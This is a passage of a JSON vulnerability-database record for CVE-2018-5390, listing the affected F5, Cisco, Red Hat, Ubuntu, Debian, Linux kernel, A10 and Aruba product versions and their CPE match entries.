        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10.4"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "advanced core operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "a10networks",
        "version": "4.1.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gt",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "advanced core operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "a10networks",
        "version": "4.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "expressway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10.2"
      },
      {
        "model": "advanced core operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "a10networks",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.18"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "meeting management",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1."
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "expressway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "aruba clearpass policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "hp",
        "version": "6.7.0"
      },
      {
        "model": "aruba clearpass policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "hp",
        "version": "6.6.9"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "meeting management",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "1.0.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "network assurance engine",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "2.1\\(1a\\)"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "webex video mesh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "telepresence conductor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "xc4.3"
      },
      {
        "model": "traffix systems signaling delivery controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.1.0"
      },
      {
        "model": "telepresence video communication server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "x8.10"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "advanced core operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "a10networks",
        "version": "4.1.2"
      },
      {
        "model": "telepresence conductor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "xc4.3.4"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "adtran",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "akamai",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "amazon",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arista",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "check point",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "debian gnu linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip application security manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "f5",
        "version": "12.1.3"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#962459"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5390"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.18",
                "versionStartIncluding": "4.9",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:4.18:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:4.18:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:4.18:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:4.18:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:4.18:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:4.18:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:hp:aruba_clearpass_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.6.9",
                "versionStartIncluding": "6.6.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:hp:aruba_clearpass_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.7.5",
                "versionStartIncluding": "6.7.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:hp:aruba_airwave_amp:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "8.2.7.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.3",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:14.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:traffix_systems_signaling_delivery_controller:4.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:traffix_systems_signaling_delivery_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.1.0",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartExcluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1.",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
